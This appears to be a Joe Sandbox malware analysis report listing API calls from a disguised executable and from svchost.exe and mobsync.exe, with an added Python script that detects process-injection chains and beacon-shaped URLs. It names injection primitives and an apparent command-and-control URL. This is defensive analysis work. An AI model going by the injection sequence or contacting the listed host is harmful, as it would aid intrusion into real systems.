Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73D70 NtOpenThread
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04374650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04374340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043739B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372FA0 NtQuerySection
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04372BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04373010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04373090 NtSetValueKey
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04373D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04373D70 NtOpenThread
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00169100 NtCreateFile
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00169270 NtReadFile
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00169370 NtDeleteFile
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00169410 NtClose
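The native-API rows above (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtMapViewOfSection, NtQueueApcThread, NtSetContextThread and NtResumeThread in both svchost.exe and mobsync.exe) and the "String found in binary or memory" URL rows near the top of this section are the two things an analyst triages in bulk from a report like this. The script below is an added example and is not Joe Sandbox output, Joe Sandbox tooling, or anything recovered from the sample: it parses rows in the fused form shown on this page, groups the Nt* calls by the process index that leads each function ID, reports which processes cover the whole allocate/write/hijack-thread/resume injection chain, and flags URLs whose path has the shape of the beacon seen here. The regexes, the stage table (including NtCreateThreadEx, which this report does not list) and the beacon-path heuristic are assumptions made for this example; the sample rows are copied from this report.

```python
"""Bulk triage of Joe Sandbox report rows (added example, not Joe Sandbox code).

Given rows in the fused form shown on this page, the helpers below
  1. collect the Nt* calls referenced per process index and check whether they
     cover the allocate -> write -> hijack-thread -> resume injection chain, and
  2. pull URLs out of "String found in binary or memory" rows and flag the ones
     shaped like the beacon seen here (short directory, one random query key).
Regexes, stage table and beacon heuristic are assumptions made for this example.
"""
import re
from collections import defaultdict

# Constructed sample: rows copied from this report, left in their fused form.
SAMPLE_ROWS = r"""
Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mobsync.exe, 00000005.00000002.3904399243.0000000005812000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04372D10
Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04372EE0
Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04372FB0 NtResumeThread,LdrInitializeThunk,5_2_04372FB0
Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00169410 NtClose,5_2_00169410
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00646606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00646606
"""

# A code row: source cell, then "Code function: <id> <apis>,<id>" with the id repeated.
CODE_ROW = re.compile(
    r"Source:\s*(?P<src>.+?)\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s*:?\s*(?P<apis>.*?),?\s*(?P=fid)\s*$"
)
STRING_ROW = re.compile(
    r"Source:\s*(?P<src>.+?)\s*String found in binary or memory:\s*(?P<string>\S+)"
)
URL_IN_STRING = re.compile(r"https?://[^\s\"'<>]+")
# Assumed beacon shape, generalised from https://zkdamdjj.shop/kf1m/?sVC8z=...
BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{3,5}/\?[A-Za-z0-9_]{3,12}=")

# Stages of remote-thread injection and the Nt* primitives that implement each.
# NtMapViewOfSection both reserves and fills remote memory, so it counts for two.
INJECTION_STAGES = {
    "allocate": {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
    "write": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "hijack": {"NtQueueApcThread", "NtSetContextThread", "NtCreateThreadEx"},
    "resume": {"NtResumeThread"},
}


def parse_rows(text):
    """Yield ("code", src, fid, [api, ...]) or ("string", src, value) per row."""
    for line in text.splitlines():
        line = line.strip()
        m = CODE_ROW.match(line)
        if m:
            apis = [a.strip() for a in m.group("apis").split(",") if a.strip()]
            yield ("code", m.group("src"), m.group("fid"), apis)
            continue
        m = STRING_ROW.match(line)
        if m:
            yield ("string", m.group("src"), m.group("string"))


def native_calls_per_process(text):
    """Map "index:image" -> set of Nt* APIs referenced by that process."""
    calls = defaultdict(set)
    for row in parse_rows(text):
        if row[0] != "code":
            continue
        _, src, fid, apis = row
        image = re.split(r"[\\/]", src)[-1]       # basename of the Source cell
        proc = fid.split("_")[0] + ":" + image    # leading number = process index
        calls[proc].update(a for a in apis if a.startswith("Nt"))
    return dict(calls)


def injection_chain(apis):
    """Return the stages (in order) that the given set of Nt* APIs covers."""
    return [stage for stage, prims in INJECTION_STAGES.items() if apis & prims]


def suspicious_processes(text):
    """Processes whose Nt* set covers every stage of the injection chain."""
    return sorted(
        proc for proc, apis in native_calls_per_process(text).items()
        if len(injection_chain(apis)) == len(INJECTION_STAGES)
    )


def beacon_urls(text):
    """Distinct URLs from string rows whose path matches BEACON_PATH."""
    hits = []
    for row in parse_rows(text):
        if row[0] != "string":
            continue
        for url in URL_IN_STRING.findall(row[2]):
            rest = url.split("://", 1)[1]
            slash = rest.find("/")
            path = rest[slash:] if slash >= 0 else "/"
            if BEACON_PATH.match(path) and url not in hits:
                hits.append(url)
    return hits


if __name__ == "__main__":
    for proc, apis in sorted(native_calls_per_process(SAMPLE_ROWS).items()):
        print(proc, sorted(apis), "->", injection_chain(apis))
    print("full injection chain:", suspicious_processes(SAMPLE_ROWS))
    print("beacon-like URLs:", beacon_urls(SAMPLE_ROWS))
```

Two design points: the LdrInitializeThunk token that the report appends to some rows is deliberately left out of each process's API set, since it is not an Nt* call and its meaning here is not documented on this page; and the stage table treats NtMapViewOfSection as satisfying both the allocate and the write stage, because mapping a section into the target process delivers the payload without a separate NtWriteVirtualMemory, which is exactly how the mobsync.exe rows in the sample still complete the chain.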
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00646606 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0063ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_006479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062B0430_2_0062B043
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006132000_2_00613200
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00613B700_2_00613B70
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063410F0_2_0063410F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006202A40_2_006202A4
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0060E3B00_2_0060E3B0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063038E0_2_0063038E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063467F0_2_0063467F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006206D90_2_006206D9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0066AACE0_2_0066AACE
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00634BEF0_2_00634BEF
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062CCC10_2_0062CCC1
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0060AF500_2_0060AF50
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00606F070_2_00606F07
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061B11F0_2_0061B11F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006631BC0_2_006631BC
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062D1B90_2_0062D1B9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063724D0_2_0063724D
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062123A0_2_0062123A
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006093F00_2_006093F0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006413CA0_2_006413CA
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061F5630_2_0061F563
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006096C00_2_006096C0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064B6CC0_2_0064B6CC
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0066F7FF0_2_0066F7FF
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006077B00_2_006077B0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006379C90_2_006379C9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061FA570_2_0061FA57
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00609B600_2_00609B60
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00607D190_2_00607D19
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061FE6F0_2_0061FE6F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00629ED00_2_00629ED0
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00607FA30_2_00607FA3
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00D4D6280_2_00D4D628
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183B32_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029292_2_00402929
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029302_2_00402930
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EAA32_2_0042EAA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBF32_2_0040FBF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DF02_2_00402DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DDF32_2_0040DDF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025902_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165B32_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE132_2_0040FE13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF432_2_0040DF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF372_2_0040DF37
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF41A22_2_03BF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE44202_2_03BE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE2F302_2_03BE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDCD1F2_2_03BDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B85630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB9C32
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043E4420
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F2446
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043EE4F6
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04340535
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04400591
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0435C6E0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04340770
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04364750
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0433C7C0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043D2000
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043DA118
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_04330100
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043C8158
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F41A2
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_044001AA
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043F81CC
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_043E0274
